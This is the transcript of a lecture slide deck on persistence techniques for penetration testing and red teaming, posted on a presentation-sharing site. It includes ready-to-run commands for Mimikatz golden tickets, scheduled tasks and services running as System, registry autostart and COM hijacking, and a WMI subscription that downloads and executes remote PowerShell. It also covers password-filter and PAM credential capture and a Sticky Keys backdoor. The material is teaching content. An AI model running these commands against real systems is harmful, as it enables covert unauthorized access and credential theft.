Leveraging Persistence for Offensive Security

Explore the tactics and techniques of persistence for offensive security, covering topics such as penetration testing, red team engagements, credential stealing, and utilizing registry keys and scheduled tasks. Discover ways to maintain access to systems through unauthorized means and understand the importance of security fundamentals for system protection.

• Offensive Security
• Persistence
• Penetration Testing
• Red Team
• Credentials
• Registry Keys

claassen_m Follow

Uploaded on Oct 07, 2024 | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

Presentation Transcript

1. Persistence Offensive Security

2. Persistence Goals of an assessment Penetration test Red team engagement User Persistence Fewer options Elevated Persistence Requires privilege escalation Offensive Security 2

3. Why? Host reboots Ex. You broke a service with an exploit Callback/Meterpreter/Shell dies Some tools are better than others Meterpreter can sometimes call back after a connection dies Remember how these types of tools work Manipulate the system in a way they weren t intended Network goes down for a short time Offensive Security 3

4. Pieces of Persistence Storage Where is the content being stored Script Exe/Elf Command Con: Putting something on disk Trigger What tells the mechanism to execute? Offensive Security Creativity is required for both 4

5. Things to Remember Never leave the system in a less secure state What your name your files is important Where you place your files is important Offensive Security There are so many more ways to stay on a system than what I ll present here 5

6. Credentials Stealing credentials Creating local accounts Creating domain accounts Domain golden tickets/silver tickets From Mimikatz: golden_ticket_create -u [user] -d [domain] -k [krbtgthash] -s [domain SID] -t [/path/to/file] Domain skeleton keys Offensive Security Adding SSH keys to accounts 6

7. Good Ol Run Key Within the registry there are paths that autorun at start Run Keys Leaving a binary on disk Using a run key to call it HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Ru n\\ Every time the system starts it executes your executable Offensive Security You can also place entire scripts in registry keys to run 7

8. Scheduled Tasks/Cron Simple, yet effective Windows/Linux automating execution Schtasks/At schtasks /create /tn Updater /tr command to run /sc onlogon /f /ru System Offensive Security 8

9. Creating a Service Services normally run as escalated uses Helps to blend in Run on start Can place the binary anywhere on the system to help hide Offensive Security sc \\host create "service" binpath= "bin_path" start=demand DisplayName="caption" 9

10. Linux Service Modification Services use multiple files to run Config files Extra setup scripts Service binary itself Offensive Security 10

11. COM object hijacking System that allows apps to communicate through the OS COM object is defined by CLSID Load via malicious DLL or Vbscript Some of these autorun Example: HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee- 88bd00b4a5e7}\InprocServer32 HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C- 8E3D-C4579291692E }\InprocServer32 Offensive Security Not detected by Sysinternals Autoruns 11 https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

12. WMI Event Subscription wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="VirusScan", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'" wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="VirusScan", CommandLineTemplate="powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('https://URL.com/file'))\" wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"VirusScan\"", Consumer="CommandLineEventConsumer.Name=\"PushVirusScan\"" Offensive Security 12

13. DLL Hijacking Similar to what we talked about in privilege escalation Placing a malicious DLL in Windows search path Could still call the real DLL to make sure that programs execute normally Offensive Security 13

14. Sticky Keys Good for CCDC events Can modify the binary used by sticky keys Change the binary used for on-screen keyboard to cmd.exe Registry From the login screen, click on screen keyboard Shell! Offensive Security 14

15. Backdooring executables Windows Binaries often have code caves Can add our own code to them Linux Open source Can compile our own version of binaries and replace the native ones Offensive Security Completely reliant on the executables being run 15

16. DLL Filter/Pam.d Module Creating a malicious DLL filter on a domain controller When a user attempts to change their domain password a few things happen first Goes to the DC Runs through any defined filters Hashed and stored reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v "Notification Packages" Offensive Security reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v "Notification Packages" /t REG_MULTI_SZ /d scecli\0rassfm\0audit /f 16

17. Pam.d Module Pam is responsible for authentication Cleartext password goes through this first Install a modified version of Pam to log the passwords used before they are hashed Log to file File accessible by non-root account Send out over network Offensive Security 17

18. Getting Detected Even if you bypass AV SysInternals Autoruns will pick up all of these If a defender uses this or similar techniques to check the machine If you aren t careful where you place or name your binary or trigger Offensive Security 18

19. More places to check out http://www.hexacorn.com/blog/2017/01/28/beyond-good-ol- run-key-all-parts/ https://attack.mitre.org/tactics/TA0003/ Offensive Security 19

20. Next time We ll start talking about how these implants call back Efficiency Stealth Reliability Command and control C2 Offensive Security 20